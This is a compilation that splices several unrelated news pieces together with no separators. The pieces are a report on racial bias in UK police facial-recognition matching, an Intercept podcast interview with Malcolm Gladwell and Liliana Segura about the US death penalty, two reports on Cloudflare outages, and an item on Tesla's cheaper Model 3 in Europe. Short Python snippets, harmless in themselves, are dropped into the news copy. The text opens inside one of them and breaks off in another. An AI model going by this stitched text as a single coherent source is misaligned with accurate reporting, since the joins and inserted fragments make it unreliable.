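watchlist = {"suspect_a": rng.normal(size=128), "suspect_b": rng.normal(size=128)}
print(search_watchlist(rng.normal(size=128), watchlist))
```

Lowering the threshold returns more candidate matches, which is broadly why a “lower setting” produces more false positives.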
Analysts who examined the police national database’s retrospective facial recognition technology tool at a lower setting found that “the false positive identification rate (FPIR) for white subjects (0.04%) is lower than that for Asian subjects (4.0%) and black subjects (5.5%)”.
The testing went on to find that the number of false positives for black women was particularly high. “The FPIR for black male subjects (0.4%) is lower than that for black female subjects (9.9%),” the report said.
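To make the metric concrete: the false positive identification rate is typically the share of searches for people who are not on the watchlist that nevertheless return a match. A minimal sketch, using hypothetical counts chosen only to mirror the rates quoted above (this is not the NPL’s methodology or data):

```python
# Illustrative sketch only (not the NPL's methodology or data): FPIR is the share
# of searches for people NOT on the watchlist that still return a candidate match.
def fpir(false_positive_searches: int, non_mated_searches: int) -> float:
    """Fraction of non-mated searches that wrongly returned a match."""
    return false_positive_searches / non_mated_searches

# Hypothetical counts chosen only to mirror the rates quoted in the report.
print(f"{fpir(4, 10_000):.2%}")    # 0.04% (white subjects, lower setting)
print(f"{fpir(550, 10_000):.2%}")  # 5.50% (Black subjects, lower setting)
```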
The Association of Police and Crime Commissioners said in a statement that the findings showed an inbuilt bias. It said: “This has meant that in some circumstances it is more likely to incorrectly match black and Asian people than their white counterparts. The language is technical but behind the detail it seems clear that technology has been deployed into operational policing without adequate safeguards in place.”
The statement, signed off by the APCC leads Darryl Preston, Alison Lowe, John Tizard and Chris Nelson, questioned why the findings had not been released at an earlier opportunity or shared with black and Asian communities.
It said: “Although there is no evidence of adverse impact in any individual case, that is more by luck than design. System failures have been known for some time, yet these were not shared with those communities affected, nor with leading sector stakeholders.”
The government announced a 10-week public consultation that it hopes will pave the way for the technology to be used more often. The public will be asked whether police should be able to go beyond their records to access other databases, including passport and driving licence images, to track down criminals.
Civil servants are working with police to establish a new national facial recognition system that will hold millions of images.
Charlie Whelton, a policy and campaigns officer for the campaign group Liberty, said: “The racial bias in these stats shows the damaging real-life impacts of letting police use facial recognition without proper safeguards in place. With thousands of searches a month using this discriminatory algorithm, there are now serious questions to be answered over just how many people of colour were falsely identified, and what consequences this had.
“This report is yet more evidence that this powerful and opaque technology cannot be used without robust safeguards in place to protect us all, including real transparency and meaningful oversight. The government must halt the rapid rollout of facial recognition technology until these are in place to protect each of us and prioritise our rights – something we know the public wants.”
The former cabinet minister David Davis raised concerns after police leaders said the cameras could be placed at shopping centres, stadiums and transport hubs to hunt for wanted criminals. He told the Daily Mail : “Welcome to big brother Britain. It is clear the government intends to roll out this dystopian technology across the country. Something of this magnitude should not happen without full and detailed debate in the House of Commons.”
Officials say the technology is needed to help catch serious offenders. They say there are manual safeguards, written into police training, operational practice and guidance, that require all potential matches returned from the police national database to be visually assessed by a trained user and investigating officer.
A Home Office spokesperson said: “The Home Office takes the findings of the report seriously and we have already taken action. A new algorithm has been independently tested and procured, which has no statistically significant bias. It will be tested early next year and will be subject to evaluation.
“Given the importance of this issue, we have also asked the police inspectorate, alongside the forensic science regulator, to review law enforcement’s use of facial recognition. They will assess the effectiveness of the mitigations, which the National Police Chiefs’ Council supports.”
As of December 1, officials across the U.S. have executed 44 people in 11 states, making 2025 one of the deadliest years for state-sanctioned executions in recent history. According to the Death Penalty Information Center, three more people are scheduled for execution before the new year.
The justification for the death penalty is that it’s supposed to be the ultimate punishment for the worst crimes. But in reality, who gets sentenced to die depends on things that often have nothing to do with guilt or innocence.
Historically, judges have disproportionately sentenced Black and Latino people to death. A new report from the American Civil Liberties Union released in November found that more than half of the 200 people exonerated from death row since 1973 were Black.
Executions had been on a steady decline since their peak in the late 1990s . But the numbers slowly started to creep back up in recent years, more than doubling from 11 in 2021 to 25 last year, and we’ve almost doubled that again this year. Several states have stood out in their efforts to ramp up executions and conduct them at a faster pace — including Alabama .
Malcolm Gladwell’s new podcast series “ The Alabama Murders ” dives into one case to understand what the system really looks like and how it operates. Death by lethal injection involves a three-drug protocol: a sedative, a paralytic, and, lastly, potassium chloride, which is supposed to stop the heart. Gladwell explains to Intercept Briefing host Akela Lacy how it was developed, “It was dreamt up in an afternoon in Oklahoma in the 1970s by a state senator and the Oklahoma medical examiner who were just spitballing about how they might replace the electric chair with something ‘more humane.’ And their model was why don’t we do for humans what we do with horses?”
Liliana Segura , an Intercept senior reporter who has covered capital punishment and criminal justice for two decades , adds that the protocol is focused on appearances. “It is absolutely true that these are protocols that are designed with all of these different steps and all of these different parts and made to look, using the tools of medicine to kill … like this has really been thought through.” She says, “These were invented for the purpose of having a humane-appearing protocol, a humane-appearing method, and it amounts to junk science.”
Listen to the full conversation of The Intercept Briefing on Apple Podcasts , Spotify , or wherever you listen.
Akela Lacy: Malcolm and Liliana, welcome to the show.
Malcolm Gladwell: Thank you.
Liliana Segura: Thank you.
AL: Malcolm, the series starts by recounting the killing of Elizabeth Sennett, but very quickly delves into what happens to the two men convicted of killing her, John Parker and Kenny Smith. You spend a lot of time in this series explaining, sometimes in graphic detail, how the cruelty of the death penalty isn’t only about the execution, but also about the system around it — the paperwork, the waiting. This is not the kind of subject matter that you typically tackle. What drew you to wanting to report on the death penalty and criminal justice?
MG: I wasn’t initially intending to do a story about the death penalty. I, on a kind of whim, spent a lot of time with Kate Porterfield, who’s the psychologist who studies trauma, who shows up halfway through “The Alabama Murders.”
I was just interviewing her about, because I was interested in the treatment of traumatized people, and she just happened to mention that she’d been involved with the death penalty case — and her description of it was so moving and compelling that I realized, oh, that’s the story I want to tell. But this did not start as a death penalty project. It started as an exploration of a psychologist’s work, and it kind of took a detour.
AL: Tell us a little bit more about how the bureaucracy around the death penalty masks its inherent cruelty.
MG: There’s a wonderful phrase that one of the people we interviewed, Joel Zivot, uses. He talks about how the death penalty — he was talking about lethal injection, but this is also true of nitrogen gas — he said it is the impersonation of a medical act. And I think that phrase speaks volumes, that a lot of what is going on here is a kind of performance that is for the benefit of the viewer. It has to look acceptable to those who are watching, to those who are in society who are judging or observing the process.
“They’re interested in the impersonation of a medical act, not the implementation of a medical act.”
It is the management of perception that is compelling and driving the behavior here — not the actual treatment of the condemned prisoner him/herself. And once you understand that, oh, it’s a performance, then a lot of it makes sense.
One of the crucial moments in the story we tell is a hearing in which the attorneys for Kenny Smith are trying to get a stay of execution, and they start asking the state of Alabama, the corrections people in the state of Alabama, to explain: did they understand what they would do? They were contemplating the use of nitrogen gas. Did they ever talk to a doctor about the risks associated with it? Did they ever contemplate any of the potential side effects? And it turns out they had done none of that. And it makes sense when you realize that’s not what they’re interested in.
They’re interested in the impersonation of a medical act, not the implementation of a medical act. The bureaucracy is there to make it look good, and that was one of the compelling lessons of the piece.
AL: And it’s impersonating a medical act with people who are not doctors, right? Like people who are not, do not have this training.
MG: In that hearing, there’s this real incredible moment where one of the attorneys asks the man who heads Alabama’s Department of Corrections, did you ever consult with any medical personnel about the choice of execution method and its possible problems? And the guy says no.
You just realize, they’re just mailing it in. Like they have no — the state of Alabama is not interested in exploring the kind of full implications of what they’re doing. They’re just engaged in this kind of incredibly slapdash operation.
“It has to look acceptable to those who are watching, to those who are in society who are judging or observing the process.”
AL: Liliana, I wanna bring you in here. You’ve spent years reporting on capital punishment in the U.S. and looked into many cases in different states. Why are states like Florida and Alabama ramping up the number of executions? Is it all politics? What’s going on there?
LS: That is one of the questions that I think a lot of us who cover this stuff have been asking ourselves all year long. And to some degree, it’s always politics. The story of the death penalty, the story of executions, so often really boils down to that.
We are in a political moment right now where the climate around executions, certainly, and I think more generally the kind of appetite for, or promotion of, vengeance and brutality toward our enemies, is really shockingly real. And I was reluctant about a year ago to really trace our current moment to Trump. The death penalty has been a bipartisan project; I don’t want to pretend like this is something that begins and ends with somebody like Trump.
That said, it’s really shocking to see the number of executions that are being pushed through, especially in Florida. And this is something that has been ramped up by Gov. DeSantis for purely political reasons. This death penalty push in Florida began with his political ambitions when he was originally going to run for president. And I think that to some degree is a story behind a lot of death penalty policy, certainly going back decades, and certainly speaks to the moment we’re in.
I did want to just also touch on some of what Malcolm was talking about when it comes to the performance of executions themselves. Over the past many years, I’ve reported on litigation, death penalty trials, that have taken place in states like Oklahoma and here in Tennessee where I live, where we restarted executions some years ago after a long time of not carrying any out. And these trials had, at the center, the three-drug protocol that is described so thoroughly in the podcast.
It is absolutely true that these are protocols that are designed with all of these different steps and all of these different parts, and made to look — using the tools of medicine to kill — like this has really been thought through. But when you really trace that history — as you do, Malcolm, in your podcast — there’s no there there.
These were invented for the purpose of having a humane-appearing protocol, a humane-appearing method, and it amounts to junk science. There was no way to test these methods. Nobody can tell us, as you described in your podcast, what it feels like to undergo this execution process. And I think it’s really important to remember that this is not only the story of lethal injection, this is the story of executions writ large.
When the electric chair came on the scene generations ago, it was also touted as the height of technology because it was using electricity and it was supposed to be more humane than hanging. There had been botched hangings that were seen as gruesome ordeals. So there’s this bizarre way in which history repeats itself when it comes to these methods that are promoted as the height of modernity and humanity —and it’s just completely bankrupt and false.
AL: Malcolm, do you want to add something?
MG: Yeah. A big focus of the series is the case I’m describing: Kenny Smith was notorious because he had a botched execution where they couldn’t find a vein. And one of the points that Joel Zivot makes is that, of course, it’s not surprising that, in that case and in many others, they can’t find a vein, because that is a medical procedure that is designed to be undertaken in a hospital setting by trained personnel with the cooperation of the patient. Usually we’d find a vein, and the patient cooperates because we’re trying to save their life or make them healthier. This is a use of this procedure that is completely different. It is outside of a medical institution, not being done by people who are experienced medical professionals, and is not being done with the cooperation of the patient. The patient in this case is a condemned prisoner who is not in the same situation as someone who’s ill and trying to get better.
AL: I want to just walk our listeners through this. So this is, again, one of the pieces of the series, this three-drug protocol. First there’s a sedative, then there’s a paralytic, and then there’s finally potassium chloride, which is supposed to stop the heart. How did that protocol come to be developed?
MG: It was dreamt up in an afternoon in Oklahoma in the 1970s by a state senator and the Oklahoma medical examiner who were just spitballing about how they might replace the electric chair with something “more humane.”
And their model was, well, why don’t we do for humans what we do with horses? Which was a suggestion that had come from Ronald Reagan, then governor of California. So they just generally thought, well, we can do a version of what we do in those instances, only we’ll just ramp up the dose. This is also a kind of anesthesia sometimes.
AL: This is advertised as something that is supposed to be painless.
MG: And these drugs were also in use in the medical setting, but their idea was, we’ll take a protocol that is loosely based on what is used in a medical setting and ramp up the doses so that instead of merely sedating somebody, we’re killing them.
“ It wasn’t thought through, tested, analyzed, peer-reviewed. It was literally two guys.”
And it wasn’t thought through, tested, analyzed, peer-reviewed. It was literally two guys, dreaming up something on the back of an envelope. And one of the guys, the medical examiner, later regretted his part in the whole procedure, but the genie was out of the bottle. And everybody jumped on this as an advance over the previous iteration of killing technology.
AL: In addition to being advertised as painless, it’s also supposed to be within the bounds of the Eighth Amendment protection against cruel and unusual punishment. Can you tell us about that?
MG: In order to satisfy that prohibition against cruel and unusual punishment, you have to have some insight as to what the condemned prisoner is going through when they are being subjected to this protocol. The universe of people engaged in the capital punishment project were universally indifferent to trying to find out how exactly this worked. They weren’t curious at all to figure out, for example, was there any suffering that was associated with this three-drug protocol, or which of the three drugs is killing you? Or, I could go on and on and on.
They just implemented it and because it looked good from the outside, because you have given someone a sedative and a paralytic, it’s impossible to tell from the outside whether they’re going through any kind of suffering. It was just assumed that there should be no, there must be no suffering going on the inside.
And the Eighth Amendment does not say that people should not be subjected to the appearance of cruel and unusual punishment. It says, no, the actual punishment itself for the individual should not be cruel and unusual. So at no point in the early history of this did anyone truly satisfy the intent of the Eighth Amendment.
AL: Liliana, you’ve written a lot about this protocol as well, and the Supreme Court has taken a stance on it . Tell us about that.
LS: So one thing that’s really important to understand about the Eighth Amendment and the death penalty in this country is that the U.S. Supreme Court has weighed in on the death penalty numerous times, but has never invalidated a method of execution as violating the Eighth Amendment ban on cruel and unusual punishment. And that fact right there I think speaks volumes.
But one of the cases that I go back to over and over again in my work about lethal injection and about other execution methods, dates back to the 1940s, and it’s a case involving a man named Willie Francis, who was a teenager, a Black teenager who had been condemned to die in Louisiana. They sent him to the electric chair in 1946, and he survived. He survived their initial attempts to execute him. It’s a grotesque ordeal, there’s been a lot written historically about this.
In that case, they stopped the execution. He appealed to the U.S. Supreme Court, and a majority of justices found that attempting to kill him again wouldn’t violate the Eighth Amendment. They sent him back in 1947 and succeeded in killing him. But the language that comes out of the court in this case really goes a long way to helping us understand how we ended up where we are now. They essentially said, “Accidents happen. Accidents happen for which no man is to blame.” And there’s another turn of phrase that’s really galling, in which essentially they call this ordeal that he suffered “an innocent misadventure.” And this language, this idea that this was an innocent misadventure, finds its way into subsequent rulings decades later.
So in 2008, I believe it was, the U.S. Supreme Court took up the three-drug protocol, which at the time was being used by Kentucky. This was a case called Baze v. Rees . There was a lot of evidence, there was a lot that the justices had to look at that should have given them pause about the fact that this protocol was not rooted in science. That there had been many botched executions — in terms of the inability to find a vein, in terms of evidence that people were suffering on the gurney.
The U.S. Supreme Court upheld that protocol, and yet right around the time that they handed down that ruling, states began tinkering with the lethal injection protocol that had been the prevailing method for so long.
Without getting too deep in the weeds, the initial drug — the drug that was supposed to anesthetize people who were being killed by lethal injection — had been originally a drug called sodium thiopental , which was thought to be, believed to be, for good reasons something that could basically put a person under, where they wouldn’t necessarily feel the noxious effects of the subsequent drugs.
States were unable to get their hands on this drug for a number of reasons, and subsequently began swapping out other drugs to replace that drug. And different states tried different things. A number of states eventually settled on this drug called midazolam , which is a sedative, which does not have the same properties as the previous drug — and over and over again, experts have said that this is not a drug that’s going to be effective in providing and anesthetizing people for the purpose of lethal injection.
The Supreme Court once again weighed in. In Oklahoma, this was the case Glossip v. Gross, which the Supreme Court heard after there had been a very high-profile, really gruesome botched execution of a man named Clayton Lockett in 2014. This ended up going up to the Supreme Court. And I covered that oral argument, and what was really astonishing about that oral argument wasn’t just how grotesque it all was, but the fact that the justices were very clearly annoyed, very cranky about the fact that, only a few years after having upheld this three-drug protocol, now they’re having to deal with this thing again. And again, they upheld this protocol, despite a lot of evidence that this was completely inhumane, that there was a lot of reason to be concerned that people were suffering on the gurney while being put to death by lethal injection.
And so the reason I go back to the Willie Francis case is that it really tells us everything that we need to know. Which is that if you have decided that people condemned to die in this country are less than human, and that their suffering doesn’t matter, then there’s no limits on what you are willing to tolerate in upholding this death protocol that we’ve invented in this country. And so the Supreme Court has weighed in not only on the three-drug protocol, but on execution methods in general. And they have always found that there’s not really a problem here.
“If you have decided that people condemned to die in this country are less than human, and that their suffering doesn’t matter, then there’s no limits on what you are willing to tolerate in upholding this death protocol that we’ve invented in this country.”
MG: At a certain point, it becomes obvious that the cruelty is the point. The Eighth Amendment does not actually have any kind of impact on their thinking because they are anxious to preserve the very thing about capital punishment that is so morally noxious, which is that it’s cruel.
AL: Malcolm, one interesting thing that you talk about in this series is this concept of judicial override in Alabama, where a judge was able to impose a death sentence even if the jury recommended life in prison. This went on until 2017. As we know, death penalty cases can take decades, so it’s possible that there are still people on death row who have been impacted by judicial override. What’s your sense about how judges who went that route justified their decisions, if at all?
MG: So Alabama was one of a small number of states who, in response to the Supreme Court’s hesitancy about capital punishment in the 1970s, instituted rules which said that a judge can override a jury’s sentencing determination in a capital case.
So if a jury says, “We want life imprisonment without parole,” the judge could impose a death penalty or vice versa. The motivation for this series of override laws — and only about three or four states, Florida, Alabama and a couple of others, had them — is murky. But I suspect what they wanted to do was to guard against the possibility that juries would become overwhelmingly lenient.
The concern was that public sentiment was moving away from the death penalty to the extent that it would be difficult to impose a death penalty in capital cases unless you allowed judges to independently assert their opinion when it came to sentencing. And I also suspect that, in states like Alabama, there was a little bit of a racial motivation: they thought that Black juries would be unlikely to vote for the death penalty for Black defendants, and they wanted to reserve the right to act in those cases.
And what happens in Alabama is that other states gradually abandon this policy, but Alabama sticks to it — not only that, they have the most extreme version of it. They basically allow the judge to overrule under any circumstances without giving an explanation for why.
And when they finally get rid of this, they don’t make it retroactive. So they only say, “Going forward, we’re not going to do override. But we’re not going to spare people who are on death row now because of override — we’re not going to spare their lives.” And so it raises this question about, the reason we call our series “The Alabama Murders” is that when you look very closely at the case we’re interested in, you quickly come to the conclusion there’s something particularly barbaric about the political culture of Alabama. Not news, by the way, for anyone who knows anything about Alabama. But Alabama, it’s its own thing, and they remain to this day clinging to this notion that they need every possible defense against the possibility that a convicted murderer could escape with his life.
AL: Speaking of the title of the show, I also want to bring up something I did not know: the autopsy after an execution, and I don’t know whether this is unique to Alabama, marks the death as a homicide. I was actually shocked to hear that.
MG: Yeah, isn’t that interesting? That is the one moment of honesty and self-awareness in this entire process.
AL: Right, that’s why it’s shocking. It’s not shocking because we know it’s a homicide. It’s shocking because they’re admitting to it in a record that is accessible to the public at some point.
[Break]
AL: Malcolm, you mentioned the racial dynamic with Alabama in particular, but Liliana, I want to ask if you could maybe speak to the historic link between the development of the death penalty and the history of lynching in the South.
LS: So it’s really interesting. Alabama is, in many ways, the poster child for this line that can be drawn between not only lynching, but slavery to lynching, to Reconstruction, to state-sanctioned murder. And that’s an uneasy line to draw in the sense of — there’s a reason that Bryan Stevenson, who is the head of the Equal Justice Initiative, has called the death penalty the “stepchild of lynching.”
He calls it the stepchild of lynching and it’s because, there’s something of an indirect link, but it’s an absolutely — that link is real. And you really see it in Alabama and certainly in the South. I think it was in 2018, I went down to Montgomery a number of times for the opening of EJI’s lynching memorial that they had launched there and this was a major event. At the time I went with this link in mind to try to interrogate and understand this history a little bit better. And I ended up writing this big long piece, which I only recently went back to reread because it’s not fresh in my mind anymore.
But one of the things that is absolutely, undoubtedly true is that the death penalty in the South in its early days was justified using the exact same rationale that people used for lynching, which was that this was about protecting white women from sexually predatory Black men.
“The death penalty in the South in its early days was justified using the exact same rationale that people used for lynching.”
And that line, that consistent feature of executions — whether it was an extrajudicial lynching or an execution carried out by the state — has been really consistent and I think overlooked in the history of the death penalty. And part of the reason it’s overlooked is that, again, going back to the Supreme Court, there have been a number of times that this history has come before the Supreme Court and other courts, and by and large, the reaction has been to look away, to deny this.
That is absolutely true. In the years leading up to the 1972 case, Furman v. Georgia, which Malcolm alluded to earlier, there was this moment where the Supreme Court had to pause executions. This was a four-year period in the ’70s: 1972 was Furman v. Georgia, and 1976 was Gregg v. Georgia. Part of the reason that Furman, which was this 1972 case, invalidated the death penalty across the country was because there was evidence that death sentences were being handed down in what they called an arbitrary way.
And in reality, it wasn’t so much arbitrariness, as very clear evidence of sentences that were being given disproportionately to people of color, to Black people, and history showed that that was largely motivated by cases in which a victim was white. It was a white woman maybe who had been subjected to sexual violence. There is that link, and I think it’s really important to remember that.
In Alabama, one of the really interesting things too, going back to judicial override, is that there’s this kind of irony in the history of judicial override in the way that it was carried out by judges. Alabama, when it restarted the death penalty in the early ’80s, was getting a lot of flak for essentially having a racist death penalty system. Of course, there was a lot of defensiveness around this, and there were cases where juries did not come back with a death sentence for a white defendant and judges then overrode that decision in a sort of display of fairness.
One of the things that I found when I was researching my piece from 2018 was that there was a judge in, I believe it was 1999, who explained why he overrode the jury in sentencing this particular white man to die. And he said, “If I had not imposed the death sentence, I would’ve sentenced three Black people to death and no white people.” So this was his way of ensuring fairness. “Well, I’ve gotta override it here,” never mind what it might say about the jury in the decision not to hand down a death sentence for a white person.
“They needed the appearance of fairness.”
Again, it goes back to appearance. They needed the appearance of fairness. And so Alabama really does typify a certain kind of racial dynamic and early history of the death penalty that you see throughout the South, not just the South, but especially in the South.
AL: One of the things proponents of the death penalty are adamant about is that it requires some element of secrecy to survive.
Executions happen behind closed walls, in small rooms, late at night. The people involved never have their identities or their credentials publicly revealed. The concern is that if people really knew what was involved, there would be a massive public outcry. Malcolm, in this series you describe in gruesome detail what is actually involved in an execution. For folks who haven’t heard the series, tell us about that.
MG: In Alabama, there is a long execution protocol. A written script, which was made public only because it came out during a lawsuit, which kind of lays out all the steps that the state takes. And Alabama also has, to your point, an unusual level of secrecy.
For example, in many states, the entire execution process is open, at least to witnesses. In Alabama, you only see the person after they’ve found a vein. So the Kenny Smith case, we were talking about where they spent hours unsuccessfully trying to find a vein — that was all done behind closed doors.
And the second thing that you pointed out is the people who are involved remain anonymous, and you can understand why. It is an acknowledgment on the part of these states that they are engaged in something shameful. If they were as morally clearheaded as they claim to be, then what would be the problem with making every aspect of the process public?
But instead, they go in the opposite direction and they try and shroud it. They make it as much of a mystery as they can. And it’s funny, so much of our knowledge about death penalty procedures only comes out because of lawsuits.
“If they were as morally clearheaded as they claim to be, then what would be the problem with making every aspect of the process public?”
It is only under the compulsion of the judicial process that we learn even the smallest tidbit about what’s going on or what kind of thought went into a particular procedure. When we’re talking about the state taking the life of a citizen of the United States, that’s weird, right?
We have more transparency over the most prosaic aspects of government practice than we do about something that involves something as important as taking someone’s life.
AL: Liliana, you’ve witnessed two executions. Tell us about your experience, and particularly this aspect of secrecy surrounding the process.
LS: Let me just pick up first on the secrecy piece because one of the really bizarre aspects of the death penalty, when you’ve covered it in different states and looked at the federal system as well, is that there’s just this wide range when it comes to what states and jurisdictions are willing to reveal and show.
What they are not willing to reveal is certainly the individuals involved. A ton of death penalty states have passed secrecy legislation, essentially bringing all of that information even further behind closed doors. The identity of the executioners was always sort of a secret. But now we don’t get to know where they get the drugs, and in some states, in some places, the secrecy is really shocking. I just wrote a story about Indiana, which recently restarted executions. And Indiana is the only active death penalty state that does not allow any media witnesses. There is nothing, and that’s exceptional.
And if you go out and try as a journalist to cover an execution in Indiana, it’s not going to be like in Alabama or in Oklahoma, where the head of the DOC comes out and addresses things and says, whether true or not true, “Everything went great.” No, you are in a parking lot at midnight across from the prison. There is absolutely nobody coming to tell you what happened. It’s a ludicrous display of indifference and contempt, frankly, for the press or for the public that has a right and an interest in knowing what’s happening in their names. So secrecy — there’s a range, I guess is my point, and yes, most places err on the side of not revealing anything, but some take that a lot further than others.
In terms of the experience of witnessing an execution, that’s obviously a big question. I will say that both those executions were in Oklahoma. That is a state that has a really ugly sordid history of botched executions going back longer than 10 years .
But Oklahoma became infamous on the world stage about 10 years ago, a little more, for botching a series of executions. I’ve been covering the case of Richard Glossip for a while. Richard Glossip is a man with a long-standing innocence claim whose death sentence and conviction was overturned only this year. Richard Glossip was almost put to death by the state of Oklahoma in 2015, and I was outside the prison that day. And it’s only because they had the wrong drug on hand that it did not go through.
And so going into a situation where I was preparing to witness an execution in Oklahoma, I was all too keenly aware of the possibility that something could go wrong — and that’s just something you know when you’re covering this stuff. And instead, Oklahoma carried out the three-drug protocol execution of a man named Anthony Sanchez in September of 2023. I had written about Anthony’s case. I had spoken to him the day before and for the better part of a year. And I think I’m still trying to understand what I saw that day because, by all appearances, things looked like they went as smoothly as one would hope, right?
He was covered with a sheet. You saw the color in his face change. He went still. And as a journalist or just an ordinary person trying to describe what that meant, what I was seeing — I couldn’t really tell you, because the process by design was made to look that way, but I could not possibly guess as to what he was experiencing.
Again, that’s because lethal injection and that three-drug protocol has been designed to make it look humane and make it look like everything’s gone smoothly.
I will say one thing that has really stuck with me about that execution was that I was sitting right behind the attorney general of Oklahoma, Gentner Drummond, who has attended — I think to his credit, frankly — every execution that has been carried out in Oklahoma under his tenure. He was sitting in front of me, and the one witness who was there, who I believe was a member of Anthony’s family, was sitting one seat over. After the execution was over, she was quietly weeping, and Gentner Drummond, the attorney general who was responsible for this execution, put his hand on her and said, “I’m sorry for your loss.” And it was this really bizarre moment because he was acknowledging that this was a loss, that this death of this person that she clearly cared about — he was responsible for it.
And I don’t know that he has ever said something like that since, because a lot of us journalists in the room reported back. And it’s almost like, you’re not supposed to say that — there shouldn’t be sorrow here, really. This is justice. This is what’s being done in our name. And I’m still trying to figure out how I feel about that. Because by and large in the executions I’ve reported on, you don’t have the attorney general himself or the prosecutor who sent this person to death row attending the execution. It’s out of sight, out of mind.
AL: Malcolm, as we’ve talked about and has been repeatedly documented, the way that the death penalty has been applied has been racist and classist, disproportionately affecting Black and Latino people and poor people. It has also historically penalized people who have mental health issues or intellectual disabilities . Even with all that evidence, why does this persist? How has vengeance become such a core part of the American justice system?
MG: As I said before, I think what’s happened is that the people who are opposed to the death penalty are having a different conversation than the people who are in favor of it.
The people who are in favor are trying to make a kind of moral statement about society’s ultimate intolerance of people who violate certain kinds of norms, and they are in the pursuit of that kind of moral statement, willing to go to almost any lengths. And on the other side are people who are saying that going this far is outside of the moral boundaries of a civilized state.
Those are two very different claims that proceed on very different assumptions. And we’re talking past each other. It doesn’t matter to those who are making a broad moral statement about society’s intolerance what this condition, status, background, makeup of the convicted criminal is — because they’re not basing their decision on the humanity of the defendant, the criminal defendant. They’re making a broad moral point.
“I’ve often wondered whether in doing series, as I did, that focus so heavily on the details of an execution, I’m contributing to the problem.”
I’ve often wondered whether in doing series, as I did, that focus so heavily on the details of an execution, I’m contributing to the problem. That if opponents make it all about the individual circumstances of the defendant, the details of the case, was the person guilty or not, was the kind of punishment cruel and unusual — we’re kind of buying into the moral error here.
Because we’re opening the possibility that if all we were doing was executing people who were 100% guilty and if our method of execution was proven without a shadow of a doubt to be “humane,” then we don’t have a case anymore.
AL: Right, then it’d be fine.
MG: So I look at what I’ve done — that’s my one reservation about spending all this time on the Kenny Smith case, is that we shouldn’t have to do this. It should be enough to say that even the worst person in the world does not deserve to be murdered by a state.
That’s not what states do, right, in a civilized society. That one sentence ought to be enough. And it’s a symptom of how distorted this argument has become — that it’s not enough.
AL: Liliana, I want to briefly get your thoughts on this too.
LS: I think that people who are opposed to the death penalty, and abolitionists, oftentimes say, “This is a broken system.” And we talk about prisons in that way; “this is a broken system.”
I think it’s a mistake to say that this is a broken system because I don’t think that this system, at its best, as you’ve just discussed, would be fine if it only worked correctly. I think that that’s absolutely not the case. So I do agree that, this system — I don’t hide the fact that I’m very opposed to the death penalty. I don’t think that you can design it and improve it and make it fair and make it just.
“I don’t think that you can design it and improve it and make it fair and make it just.”
I also think that part of the reason that people have a hard time saying that is: If you were to say that about the death penalty in this country, for all of the reasons that may be true, then you would be forced to deal with the criminal justice system more broadly, and with prisons and sentencing as a whole. And I think that there’s a real reluctance to see the problems that we see in death penalty cases in that broader context, because what does that mean for this country if you’re calling into question mass incarceration and the purpose that these sentences serve?
AL: We’ve covered a lot here. I want to thank you both for joining me on the Intercept Briefing.
MG: Thank you so much.
LS: Thank you.
A host of websites including LinkedIn , Zoom and Downdetector went offline on Friday morning after fresh problems at Cloudflare.
Cloudflare said shortly after 9am UK time that it was “investigating issues with Cloudflare Dashboard and related APIs”, referring to application programming interfaces.
The internet infrastructure provider said users had seen “a large number of empty pages” as a result. It added shortly after that it had implemented a potential fix and was monitoring the results.
A number of websites and platforms were down, including the Downdetector site used to monitor online service issues. Users reported problems with other websites including Zoom , LinkedIn, Shopify and Canva, although many are back online.
The Downdetector website recorded more than 4,500 reports related to Cloudflare after it came back online.
The Indian-based stockbroker Groww said it was facing technical issues “due to a global outage at Cloudflare”. Its services have since been restored.
Cloudflare provides network and security services for many online businesses to help their websites and applications operate. It claims that about 20% of all websites use some form of its services.
It comes only three weeks after previous problems at Cloudflare hit the likes of X, ChatGPT, Spotify, and multiplayer games such as League of Legends.
Jake Moore, a global cybersecurity adviser at ESET, said: “If a major provider like Cloudflare goes down for any reason, thousands of websites instantly become unreachable. The problems often lie with the fact we are using an old network to direct internet users around the world to websites, but it simply highlights there is one huge single point of failure in this legacy design.”
Tesla has launched the lower-priced version of its Model 3 car in Europe in a push to revive sales after a backlash against Elon Musk’s work with Donald Trump and weakening demand for electric vehicles.
Musk, the electric car maker’s chief executive, has argued that the cheaper option, launched in the US in October, will reinvigorate demand by appealing to a wider range of buyers.
The new Model 3 Standard is listed at €37,970 (£33,166) in Germany, 330,056 Norwegian kroner (£24,473) and 449,990 Swedish kronor (£35,859). The move follows the launch of a lower-priced Model Y SUV , Tesla’s bestselling model, in Europe and the US.
Tesla sales have slumped across Europe as the company faces increasingly tough competition from its Chinese rival BYD, which outsold the US electric vehicle maker across the region for the first time in spring.
Sales across the EU have also been hurt by a buyer backlash against Musk’s support for Trump’s election campaign and period working in the president’s administration.
In his role running the “department of government efficiency”, or Doge, the tech billionaire led sweeping job cuts, but quit in May after falling out with Trump over the “big, beautiful” tax and spending bill.
Musk has also alienated customers through other controversial political interventions, including appearing to give a Nazi salute at Trump’s victory rally, showing support for Germany’s far-right AfD party , and accusing Keir Starmer and other senior UK politicians of covering up the scandal about grooming gangs .
New taxes on electric cars in last month’s budget could undermine UK demand, critics have said. UK electric car sales grew at their slowest rate in two years in November, at just 3.6%, according to figures from the Society of Motor Manufacturers and Traders (SMMT).
“[This] should be seen as a wake-up call that a sustained increase in demand for EVs cannot be taken for granted,” said Mike Hawes, the chief executive of the SMMT. “We should be taking every opportunity to encourage drivers to make the switch, not punishing them for doing so.”
The chancellor’s new pay-per-mile road tax on EVs will charge drivers 3p for every mile from April 2028, costing motorists about £250 a year on average.
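As a back-of-the-envelope check on those figures, the £250 average implies annual mileage of roughly 8,300 miles. The mileage below is inferred from the reported numbers, not taken from the policy itself.

```python
# Back-of-the-envelope check on the pay-per-mile figures above. The annual mileage
# is inferred from the reported numbers, not an official assumption.
rate_per_mile = 0.03          # £0.03 per mile from April 2028
average_annual_cost = 250     # reported average cost per driver, in £

implied_miles = average_annual_cost / rate_per_mile
print(f"Implied average annual mileage: {implied_miles:,.0f} miles")  # ~8,333
```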
Cloudflare is down, as websites are crashing with a 500 Internal Server Error. Cloudflare has confirmed that it's investigating the reports.
Cloudflare, a service that many websites use to stay fast and secure, is currently facing problems.
Because of this, people visiting some websites are seeing a “500 Internal Server Error” message instead of the normal page.
A 500 error usually means something went wrong on the server side, not on the user’s device or internet connection.
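For developers on the receiving end, a 500 from an upstream provider like Cloudflare is usually transient, so clients typically back off and retry rather than blaming the user’s device. A minimal sketch using the Python requests library; the URL below is a placeholder:

```python
# Minimal sketch of client-side handling for 5xx responses, assuming the
# `requests` library is installed; the URL is a placeholder, not a real endpoint.
import time
import requests

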